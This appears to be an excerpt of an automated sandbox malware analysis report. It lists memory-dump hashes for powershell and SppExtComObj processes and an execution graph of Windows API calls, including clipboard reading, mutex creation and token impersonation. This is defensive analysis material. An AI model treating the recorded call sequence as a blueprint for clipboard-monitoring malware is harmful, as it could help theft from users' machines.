                                                                                      • Source File: 0000000C.00000002.1971990635.00007FF849060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849060000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff849060000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (B*I$(B*I$(B*I$(B*I$(B*I
                                                                                      • API String ID: 0-1992143504
                                                                                      • Opcode ID: 149d021a74901ce7b48df98dbd4fbcf4e0ab1c437c0f8c74f2987f571413ceec
                                                                                      • Instruction ID: efc29ac3303a3e689e437000d5490d5f7bdf1bcd723dd8c1c624b17f7e7b7174
                                                                                      • Opcode Fuzzy Hash: 149d021a74901ce7b48df98dbd4fbcf4e0ab1c437c0f8c74f2987f571413ceec
                                                                                      • Instruction Fuzzy Hash: E4D11132D0DACA5FEBA5EB28A8255B57BE0EF16754F0801FAD44DCB193DA18EC05C351
                                                                                      Function 00007FF8490640BF Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971990635.00007FF849060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849060000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff849060000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8>*I
                                                                                      • API String ID: 0-1514533588
                                                                                      • Opcode ID: d1bb4004cd7632809a44b39d1cd1eecaa16d886aa0f9ac03d5ba4db8c4e2b33d
                                                                                      • Instruction ID: cd99fb316fff8499732f31bd674f2ef3230e1268a865e43b5442d1ff7f28ce08
                                                                                      • Opcode Fuzzy Hash: d1bb4004cd7632809a44b39d1cd1eecaa16d886aa0f9ac03d5ba4db8c4e2b33d
                                                                                      • Instruction Fuzzy Hash: 9B21B432D0EAC74FEBB9EF1894551B536D5EF54790B5900BAC10ECB2A6CF28DC458345
                                                                                      Function 00007FF8490643BC Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971990635.00007FF849060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849060000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff849060000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p>*I
                                                                                      • API String ID: 0-82149894
                                                                                      • Opcode ID: 1f094d671669538fd5a16fe2e8441cef664e7a71c3dcd77dead61f24ae5b5f80
                                                                                      • Instruction ID: 44df96ce70c21084038f5a3f7a4578bee873150868da508d2eb7bddc6e6ef62d
                                                                                      • Opcode Fuzzy Hash: 1f094d671669538fd5a16fe2e8441cef664e7a71c3dcd77dead61f24ae5b5f80
                                                                                      • Instruction Fuzzy Hash: DE11A132E0E5964FEBB5EE28A4556B876D1FF44660B4900BAD10DC7196DB19EC048381
                                                                                      Function 00007FF848F9A063 Relevance: .2, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f11518eb46e3bb01f9a72f5d88b5378558248a9fff35abd961899f1b51f3de9
                                                                                      • Instruction ID: 2a873a5d17833f60e91e98cad8bd5b54ae8c73121975c7045ee19d6978b43609
                                                                                      • Opcode Fuzzy Hash: 6f11518eb46e3bb01f9a72f5d88b5378558248a9fff35abd961899f1b51f3de9
                                                                                      • Instruction Fuzzy Hash: 6C51C877C0E6A25FE705F72CB8960E57BB0EF51B79F0800B7D188890D3FE15548986A9
                                                                                      Function 00007FF848F99828 Relevance: .1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 045a9388db515c7c1e033fb28384c07764396423c8bf90aac9db4b037c42a037
                                                                                      • Instruction ID: e3e7c391c9ee803f11b6e58889311d260b62eaf01c4f39faebf5d75b2d0272ad
                                                                                      • Opcode Fuzzy Hash: 045a9388db515c7c1e033fb28384c07764396423c8bf90aac9db4b037c42a037
                                                                                      • Instruction Fuzzy Hash: 29411531D0CB888FDB1DDF5CA8066B87BE1FBA5710F54416FE04993296DB34A8458BC6
                                                                                      Function 00007FF848E7ED40 Relevance: .1, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1970305666.00007FF848E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848e7d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 854ce2b24cf862023182d24dcf15740dbb483248795f034a6c754cdf46f8981f
                                                                                      • Instruction ID: ecd9a4fa2d44933af94462a129f7f7e23ee137908712ce268a132982c6082009
                                                                                      • Opcode Fuzzy Hash: 854ce2b24cf862023182d24dcf15740dbb483248795f034a6c754cdf46f8981f
                                                                                      • Instruction Fuzzy Hash: E141137180DBC44FE7569B389851A523FF0FF57260F1905EFD088CB1A3D629A846C7A2
                                                                                      Function 00007FF848F9A57C Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d479e56364bcb82c442fff5e51b92cbd888f55360e00884193ad55433306129
                                                                                      • Instruction ID: f9c8c188de439da55e320f5393394897ca9bd650871657a69b6ee6f473797b99
                                                                                      • Opcode Fuzzy Hash: 2d479e56364bcb82c442fff5e51b92cbd888f55360e00884193ad55433306129
                                                                                      • Instruction Fuzzy Hash: 1C21283090CB4C4FDB59DF6C984A7E97FF1EB96321F04416BD448C7192DA74984ACB91
                                                                                      Function 00007FF848F933A5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ad7c804d55132176d47c9a47c1d29a8c79bb6f340434ec7a1e581545207b668
                                                                                      • Instruction ID: 6beb74dc895f3fd00ddff5e0030386769ed0dbea1a55b7aa1b19076df5da42ea
                                                                                      • Opcode Fuzzy Hash: 3ad7c804d55132176d47c9a47c1d29a8c79bb6f340434ec7a1e581545207b668
                                                                                      • Instruction Fuzzy Hash: A201447115CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A1DB26E881CB46

                                                                                      Non-executed Functions

                                                                                      Function 00007FF8490630E9 Relevance: .7, Instructions: 655COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971990635.00007FF849060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849060000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff849060000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94266cd24bb6749ef5fe1520a8d398ef198cc82dc0622d2d83b04e6198ad1287
                                                                                      • Instruction ID: c23ae7842803eb9e804299e0dc225d24715d429589947634f35a0ee68ece2fbc
                                                                                      • Opcode Fuzzy Hash: 94266cd24bb6749ef5fe1520a8d398ef198cc82dc0622d2d83b04e6198ad1287
                                                                                      • Instruction Fuzzy Hash: 9F12E522E0DBC64FEBA6EA2868552B57BE1EF56750B0901FBC44DC7193DE18EC078391
                                                                                      Function 00007FF848F985AD Relevance: 7.7, Strings: 6, Instructions: 224COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: R_^$R_^$R_^$R_^$R_^$R_^
                                                                                      • API String ID: 0-3010980321
                                                                                      • Opcode ID: 3cc4658fed73f4b33b0f7e1554f82cd61466ba99eca22c7f70c36ec6efd9f37c
                                                                                      • Instruction ID: 437abbfc05b66f620a6e3d7daaa3f22bb078e18905d4fb42e0cf19fddc2f0fda
                                                                                      • Opcode Fuzzy Hash: 3cc4658fed73f4b33b0f7e1554f82cd61466ba99eca22c7f70c36ec6efd9f37c
                                                                                      • Instruction Fuzzy Hash: DA61D8B3D1DAD24FE31A5B3858650E16F90EF62769B4E00BAC0DD4B0D3FE156C0A8B15
                                                                                      Function 00007FF848F98762 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: R_^$R_^$R_^$R_^
                                                                                      • API String ID: 0-4164973000
                                                                                      • Opcode ID: 084301480065568b828159bf4725c8cfe547af9be95f6ae50b0db5beab32d925
                                                                                      • Instruction ID: 40ba9addbfd74a31a718aa8308642f48a79377dd8b75227807e1e189f03888b6
                                                                                      • Opcode Fuzzy Hash: 084301480065568b828159bf4725c8cfe547af9be95f6ae50b0db5beab32d925
                                                                                      • Instruction Fuzzy Hash: 0921A973C0EAC64FE319A63868A51A07FA0EF21655F4905BAC1C88B1D3EE185C4A8716
                                                                                      Function 00007FF848F98B62 Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971139361.00007FF848F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff848f90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: R_^'$R_^($R_^7$R_^8
                                                                                      • API String ID: 0-2994677593
                                                                                      • Opcode ID: b05230c45a2ae80fa0c2667774379b3f138d2cbf89df5a37baeb13bda5e8e150
                                                                                      • Instruction ID: 15a5917a03a58a05b652806189428b117d0f512074d103511b922ddc48afde39
                                                                                      • Opcode Fuzzy Hash: b05230c45a2ae80fa0c2667774379b3f138d2cbf89df5a37baeb13bda5e8e150
                                                                                      • Instruction Fuzzy Hash: AD21FFE3B1A6256A92047F78F5D11E57768EFD4770B90067ED2DC4F043AE14348746D8

                                                                                      Non-executed Functions

                                                                                      Function 00007FF684C84A40 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000017.00000002.2570833552.00007FF684A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF684A80000, based on PE: true
                                                                                      • Associated: 00000017.00000002.2570696394.00007FF684A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000017.00000002.2572042733.00007FF684C9E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000017.00000002.2572042733.00007FF68569E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000017.00000002.2579903036.00007FF68659D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000017.00000002.2579945684.00007FF68659F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000017.00000002.2579986666.00007FF6865A9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_23_2_7ff684a80000_SppExtComObj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: bf7013351bea8f0f683ff0573f0f6c58ebd228a8967c8e45b9ed1b21e131e287
                                                                                      • Instruction ID: 0cfa60afa2b2116c7c6d9f8a58c5a16d59437c47b56a6b858853d28c57e97a06
                                                                                      • Opcode Fuzzy Hash: bf7013351bea8f0f683ff0573f0f6c58ebd228a8967c8e45b9ed1b21e131e287
                                                                                      • Instruction Fuzzy Hash: A3115E22604F01CAEB109F20F8552A833A4FF0975CF441A35EA5D86798DF3CD5A5C340

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:33.5%
                                                                                      Total number of Nodes:935
                                                                                      Total number of Limit Nodes:32
                                                                                      execution_graph 18021 7ff6d9de5ca0 18022 7ff6d9de5cbc 18021->18022 18023 7ff6d9de5d2d 18021->18023 18022->18023 18024 7ff6d9de5df1 18022->18024 18025 7ff6d9de5d06 WaitOnAddress 18022->18025 18023->18024 18027 7ff6d9de5de8 WakeByAddressAll 18023->18027 18025->18022 18026 7ff6d9de5d24 GetLastError 18025->18026 18026->18022 18027->18024 18060 7ff6d9cfad98 18061 7ff6d9cfade8 18060->18061 18062 7ff6d9cf28b0 58 API calls 18061->18062 18063 7ff6d9cfae75 18062->18063 18064 7ff6d9cfaef8 ProcessPrng 18063->18064 18075 7ff6d9cfb4c2 HeapFree 18063->18075 18087 7ff6d9cfaebf 18063->18087 18064->18087 18066 7ff6d9cfb57e 18068 7ff6d9dbf4b0 25 API calls 18066->18068 18067 7ff6d9cfb3b1 18070 7ff6d9cfb3bc HeapFree 18067->18070 18076 7ff6d9cfb3d3 18067->18076 18083 7ff6d9cfb680 18068->18083 18069 7ff6d9cfb371 18069->18067 18071 7ff6d9cf3d90 2 API calls 18069->18071 18070->18076 18071->18069 18072 7ff6d9cf3d90 2 API calls 18072->18087 18073 7ff6d9cfb48b 18074 7ff6d9cfb4a8 HeapFree 18073->18074 18073->18075 18074->18075 18075->18066 18076->18073 18076->18075 18076->18076 18077 7ff6d9cfb475 HeapFree 18076->18077 18077->18076 18078 7ff6d9dbf4b0 25 API calls 18078->18083 18079 7ff6d9cfbf2c 18080 7ff6d9dc98f0 4 API calls 18079->18080 18081 7ff6d9cfbf31 18080->18081 18082 7ff6d9dc9960 3 API calls 18082->18087 18083->18078 18083->18079 18084 7ff6d9dc98f0 4 API calls 18083->18084 18084->18083 18085 7ff6d9cfb35c 18089 7ff6d9de0aa0 18085->18089 18087->18067 18087->18069 18087->18072 18087->18075 18087->18082 18087->18085 18088 7ff6d9cfb31f HeapFree 18087->18088 18088->18087 18090 7ff6d9de0ac1 18089->18090 18092 7ff6d9de0b07 18089->18092 18091 7ff6d9dc9960 3 API calls 18090->18091 18090->18092 18094 7ff6d9de0bf5 18091->18094 18092->18069 18093 7ff6d9de0dfd HeapFree 18093->18092 18094->18092 18094->18093 18094->18094 18868 7ff6d9cf7e40 18948 7ff6d9cf79f0 18868->18948 18870 7ff6d9cf7ea6 18871 7ff6d9dc9960 3 API calls 18870->18871 18872 7ff6d9cf7ef4 18871->18872 18873 7ff6d9cf8a8c 18872->18873 18874 7ff6d9cf79f0 5 API calls 18872->18874 18875 7ff6d9dd0e00 4 API calls 18873->18875 18876 7ff6d9cf7f63 18874->18876 18877 7ff6d9cf8acc HeapFree 18875->18877 18879 7ff6d9dc9960 3 API calls 18876->18879 18880 7ff6d9cfb57e 18877->18880 18881 7ff6d9cf7fb1 18879->18881 18883 7ff6d9dbf4b0 25 API calls 18880->18883 18881->18873 18882 7ff6d9cf79f0 5 API calls 18881->18882 18884 7ff6d9cf8020 18882->18884 18886 7ff6d9cfb680 18883->18886 18885 7ff6d9dc9960 3 API calls 18884->18885 18887 7ff6d9cf8069 18885->18887 18888 7ff6d9dbf4b0 25 API calls 18886->18888 18891 7ff6d9cfbf2c 18886->18891 18896 7ff6d9dc98f0 4 API calls 18886->18896 18887->18873 18889 7ff6d9cf79f0 5 API calls 18887->18889 18888->18886 18890 7ff6d9cf80ad 18889->18890 18894 7ff6d9dc9960 3 API calls 18890->18894 18892 7ff6d9dc98f0 4 API calls 18891->18892 18893 7ff6d9cfbf31 18892->18893 18895 7ff6d9cf80fb 18894->18895 18895->18873 18897 7ff6d9cf79f0 5 API calls 18895->18897 18896->18886 18898 7ff6d9cf816a 18897->18898 18899 7ff6d9dc9960 3 API calls 18898->18899 18900 7ff6d9cf81b3 18899->18900 18900->18873 18901 7ff6d9cf79f0 5 API calls 18900->18901 18902 7ff6d9cf81f7 18901->18902 18903 7ff6d9dc9960 3 API calls 18902->18903 18904 7ff6d9cf8245 18903->18904 18904->18873 18905 7ff6d9cf79f0 5 API calls 18904->18905 18906 7ff6d9cf82b4 18905->18906 18907 7ff6d9dc9960 3 API calls 18906->18907 18908 7ff6d9cf8302 18907->18908 18908->18873 18909 7ff6d9cf79f0 5 API calls 18908->18909 18910 7ff6d9cf8371 18909->18910 18911 7ff6d9dc9960 3 API calls 18910->18911 18912 7ff6d9cf83bf 18911->18912 18912->18873 18913 7ff6d9cf79f0 5 API calls 18912->18913 18914 7ff6d9cf842e 18913->18914 18915 7ff6d9dc9960 3 API calls 18914->18915 18916 7ff6d9cf847c 18915->18916 18916->18873 18917 7ff6d9cf79f0 5 API calls 18916->18917 18918 7ff6d9cf84eb 18917->18918 18919 7ff6d9dc9960 3 API calls 18918->18919 18920 7ff6d9cf8539 18919->18920 18920->18873 18921 7ff6d9cf79f0 5 API calls 18920->18921 18922 7ff6d9cf85a8 18921->18922 18923 7ff6d9dc9960 3 API calls 18922->18923 18924 7ff6d9cf85f6 18923->18924 18924->18873 18925 7ff6d9cf79f0 5 API calls 18924->18925 18926 7ff6d9cf8665 18925->18926 18927 7ff6d9dc9960 3 API calls 18926->18927 18928 7ff6d9cf86ae 18927->18928 18928->18873 18929 7ff6d9cf79f0 5 API calls 18928->18929 18930 7ff6d9cf86f2 18929->18930 18931 7ff6d9dc9960 3 API calls 18930->18931 18932 7ff6d9cf8740 18931->18932 18932->18873 18933 7ff6d9cf79f0 5 API calls 18932->18933 18934 7ff6d9cf87af 18933->18934 18935 7ff6d9dc9960 3 API calls 18934->18935 18936 7ff6d9cf87fd 18935->18936 18936->18873 18937 7ff6d9cf79f0 5 API calls 18936->18937 18938 7ff6d9cf886c 18937->18938 18939 7ff6d9dc9960 3 API calls 18938->18939 18940 7ff6d9cf88ba 18939->18940 18940->18873 18941 7ff6d9cf88c3 18940->18941 18942 7ff6d9cf79f0 5 API calls 18941->18942 18946 7ff6d9cf8929 18942->18946 18943 7ff6d9cf8a3b 18944 7ff6d9cf8a08 18944->18943 18945 7ff6d9cf8a25 HeapFree 18944->18945 18945->18943 18946->18943 18946->18944 18946->18946 18947 7ff6d9cf89f2 HeapFree 18946->18947 18947->18946 18949 7ff6d9cf7a48 18948->18949 18950 7ff6d9cf7c3e 18949->18950 18954 7ff6d9cf7a56 18949->18954 18956 7ff6d9de0180 18950->18956 18952 7ff6d9cf7c4a 18952->18952 18953 7ff6d9cf7b9a 18953->18870 18954->18953 18955 7ff6d9cf7b61 HeapFree 18954->18955 18955->18953 18957 7ff6d9de01a1 18956->18957 18959 7ff6d9de01e7 18956->18959 18958 7ff6d9dc9960 3 API calls 18957->18958 18957->18959 18961 7ff6d9de02d5 18958->18961 18959->18952 18960 7ff6d9de04ed HeapFree 18960->18959 18961->18959 18961->18960 17778 7ff6d9dd99c4 17779 7ff6d9dd99d5 17778->17779 17780 7ff6d9dd9a26 17779->17780 17781 7ff6d9dd9a0a HeapAlloc 17779->17781 17784 7ff6d9dd8f98 2 API calls 17779->17784 17783 7ff6d9dd9348 14 API calls 17780->17783 17781->17779 17782 7ff6d9dd9a24 17781->17782 17783->17782 17784->17779 18028 7ff6d9cf1ded VariantToPropVariant 18029 7ff6d9cf1f53 GetErrorInfo PropVariantClear 18028->18029 18030 7ff6d9cf1e60 PropVariantToBSTR 18028->18030 18035 7ff6d9cf1ff5 18029->18035 18031 7ff6d9cf1fbc GetErrorInfo 18030->18031 18032 7ff6d9cf1ec9 18030->18032 18033 7ff6d9cf1fe7 PropVariantClear 18031->18033 18034 7ff6d9cf1fde SysFreeString 18031->18034 18032->18033 18033->18035 18034->18033 18036 7ff6d9cf199e 18035->18036 18037 7ff6d9cf209c SysFreeString 18035->18037 18039 7ff6d9dd2010 5 API calls 18036->18039 18040 7ff6d9cf224d VariantClear 18036->18040 18041 7ff6d9cf21c3 VariantClear 18036->18041 18043 7ff6d9cf7210 5 API calls 18036->18043 18044 7ff6d9cf2248 18036->18044 18048 7ff6d9cf17dd GetErrorInfo 18036->18048 18049 7ff6d9cf221b GetProcessHeap HeapFree 18036->18049 18050 7ff6d9cf25e8 18036->18050 18053 7ff6d9ddef40 4 API calls 18036->18053 18055 7ff6d9cf249d HeapFree 18036->18055 18056 7ff6d9dc9960 3 API calls 18036->18056 18057 7ff6d9cf1ab5 GetProcessHeap HeapAlloc 18036->18057 18058 7ff6d9cf1cd0 GetErrorInfo 18036->18058 18037->18036 18039->18036 18040->18036 18041->18036 18041->18044 18042 7ff6d9cf1804 18043->18036 18045 7ff6d9cf25c4 HeapFree 18044->18045 18046 7ff6d9cf25db 18044->18046 18045->18046 18047 7ff6d9cf3d90 2 API calls 18046->18047 18047->18050 18048->18042 18049->18036 18049->18044 18051 7ff6d9cf27d0 18050->18051 18054 7ff6d9cf2629 HeapFree 18050->18054 18051->18042 18052 7ff6d9cf27db HeapFree 18051->18052 18052->18042 18053->18036 18054->18050 18055->18036 18056->18036 18057->18048 18059 7ff6d9cf1ade 18057->18059 18058->18036 18058->18041 18059->18036 18095 7ff6d9cfbf68 18195 7ff6d9cf8a90 18095->18195 18097 7ff6d9cfbf6d 18098 7ff6d9cfbfaa 6 API calls 18097->18098 18099 7ff6d9cfc8f6 18098->18099 18104 7ff6d9cfc02d 18098->18104 18100 7ff6d9dc98f0 ExitProcess WaitOnAddress GetLastError WakeByAddressAll 18099->18100 18101 7ff6d9cfc8fb 18100->18101 18102 7ff6d9cf5570 HeapAlloc GetProcessHeap HeapAlloc RtlReAllocateHeap 18101->18102 18103 7ff6d9cfc90a 18101->18103 18102->18103 18106 7ff6d9cfc94d HeapFree 18103->18106 18113 7ff6d9cfc95f 18103->18113 18171 7ff6d9cfc47a 18103->18171 18104->18099 18107 7ff6d9dc9960 HeapAlloc GetProcessHeap HeapAlloc 18104->18107 18104->18171 18105 7ff6d9cfce51 CloseHandle CloseHandle 18108 7ff6d9cfceb3 CloseHandle 18105->18108 18109 7ff6d9cfce8c 18105->18109 18106->18113 18112 7ff6d9cfc1b1 18107->18112 18108->18109 18110 7ff6d9cfcecf CloseHandle 18108->18110 18109->18108 18109->18110 18111 7ff6d9cfcf0d 18109->18111 18110->18109 18110->18111 18114 7ff6d9cfd2ef HeapFree 18111->18114 18115 7ff6d9cfd306 18111->18115 18116 7ff6d9cfc319 18112->18116 18117 7ff6d9de8850 19 API calls 18112->18117 18112->18171 18118 7ff6d9d28d20 HeapReAlloc HeapAlloc GetProcessHeap HeapAlloc 18113->18118 18114->18115 18119 7ff6d9cfd325 18115->18119 18122 7ff6d9cfd317 CloseHandle 18115->18122 18120 7ff6d9cfc3a3 18116->18120 18121 7ff6d9cfc332 18116->18121 18117->18112 18129 7ff6d9cfcbdf 18118->18129 18123 7ff6d9cfd344 18119->18123 18124 7ff6d9cfd336 CloseHandle 18119->18124 18127 7ff6d9cfc395 18120->18127 18133 7ff6d9cfc3ec 18120->18133 18142 7ff6d9db9740 15 API calls 18120->18142 18125 7ff6d9db9740 15 API calls 18121->18125 18130 7ff6d9cfc354 18121->18130 18122->18119 18132 7ff6d9cfd355 CloseHandle 18123->18132 18162 7ff6d9cfd363 18123->18162 18124->18123 18125->18130 18126 7ff6d9cfc374 HeapReAlloc 18126->18127 18126->18171 18131 7ff6d9cfc431 CreateMutexW GetLastError 18127->18131 18135 7ff6d9cfc468 18127->18135 18128 7ff6d9cfd69b 18136 7ff6d9cfd6a6 HeapFree 18128->18136 18159 7ff6d9cfd6bd 18128->18159 18134 7ff6d9dc9960 HeapAlloc GetProcessHeap HeapAlloc 18129->18134 18130->18126 18130->18127 18137 7ff6d9cfc450 18131->18137 18138 7ff6d9cfc44a 18131->18138 18132->18162 18133->18126 18133->18127 18145 7ff6d9cfc40f HeapFree 18133->18145 18152 7ff6d9cfcc30 18134->18152 18139 7ff6d9cfc823 18135->18139 18140 7ff6d9cfc4fd 18135->18140 18135->18171 18136->18159 18137->18135 18141 7ff6d9cfc47f HeapFree 18137->18141 18138->18137 18143 7ff6d9cfc4c6 CloseHandle 18138->18143 18149 7ff6d9dbf4b0 25 API calls 18139->18149 18153 7ff6d9dbf4b0 25 API calls 18140->18153 18141->18135 18141->18171 18142->18133 18143->18137 18144 7ff6d9cfd41a 18148 7ff6d9cfd689 HeapFree 18144->18148 18145->18127 18146 7ff6d9cfd670 HeapFree 18146->18146 18146->18148 18147 7ff6d9cfd38d 18147->18144 18147->18146 18147->18147 18148->18128 18149->18099 18150 7ff6d9cfd54c HeapFree 18150->18162 18151 7ff6d9cfd657 18155 7ff6d9d00ff0 HeapFree 18151->18155 18157 7ff6d9dc9990 HeapAlloc GetProcessHeap HeapAlloc RtlReAllocateHeap 18152->18157 18152->18171 18154 7ff6d9cfc5b9 18153->18154 18164 7ff6d9dbc170 10 API calls 18154->18164 18155->18147 18156 7ff6d9cf1530 32 API calls 18156->18159 18158 7ff6d9cfcda5 18157->18158 18160 7ff6d9dc9990 HeapAlloc GetProcessHeap HeapAlloc RtlReAllocateHeap 18158->18160 18159->18156 18161 7ff6d9cfd790 GetClipboardData 18159->18161 18163 7ff6d9cfcdc0 18160->18163 18165 7ff6d9cfd7a4 GlobalLock 18161->18165 18162->18128 18162->18147 18162->18150 18162->18151 18169 7ff6d9cfd447 HeapFree 18162->18169 18166 7ff6d9cfcddd 18163->18166 18167 7ff6d9cfcdcb HeapFree 18163->18167 18190 7ff6d9cfc635 18164->18190 18168 7ff6d9cfd7b9 GlobalSize WideCharToMultiByte 18165->18168 18170 7ff6d9dbf9b0 150 API calls 18166->18170 18167->18166 18194 7ff6d9cfd7fc 18168->18194 18169->18162 18170->18171 18171->18105 18172 7ff6d9d00f3e AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription 18174 7ff6d9dc9960 HeapAlloc GetProcessHeap HeapAlloc 18172->18174 18173 7ff6d9d29420 HeapReAlloc HeapAlloc GetProcessHeap HeapAlloc 18173->18194 18177 7ff6d9d00f93 18174->18177 18175 7ff6d9cfd848 WideCharToMultiByte 18175->18194 18176 7ff6d9cfd892 GlobalUnlock GetCurrentThread ImpersonateAnonymousToken CloseClipboard 18176->18194 18179 7ff6d9db9a40 28 API calls 18177->18179 18178 7ff6d9cfd8cd RevertToSelf 18178->18194 18181 7ff6d9d00fe2 18179->18181 18180 7ff6d9cfd8e0 HeapFree 18180->18194 18182 7ff6d9cfbf40 101 API calls 18181->18182 18183 7ff6d9d00fe7 HeapFree 18182->18183 18185 7ff6d9dc9960 HeapAlloc GetProcessHeap HeapAlloc 18185->18194 18186 7ff6d9cfda1f CreateWaitableTimerExW 18187 7ff6d9cfda3a SetWaitableTimer 18186->18187 18188 7ff6d9cfd769 Sleep 18186->18188 18189 7ff6d9cfda74 WaitForSingleObject CloseHandle 18187->18189 18188->18159 18189->18159 18191 7ff6d9cfdaaf 18189->18191 18190->18101 18190->18171 18192 7ff6d9cf5570 HeapAlloc GetProcessHeap HeapAlloc RtlReAllocateHeap 18190->18192 18191->18188 18192->18190 18193 7ff6d9cfdafb HeapFree 18193->18194 18194->18172 18194->18173 18194->18175 18194->18176 18194->18178 18194->18180 18194->18185 18194->18186 18194->18193 18207 7ff6d9dd0e00 CoInitializeEx 18195->18207 18199 7ff6d9cfb57e 18200 7ff6d9dbf4b0 25 API calls 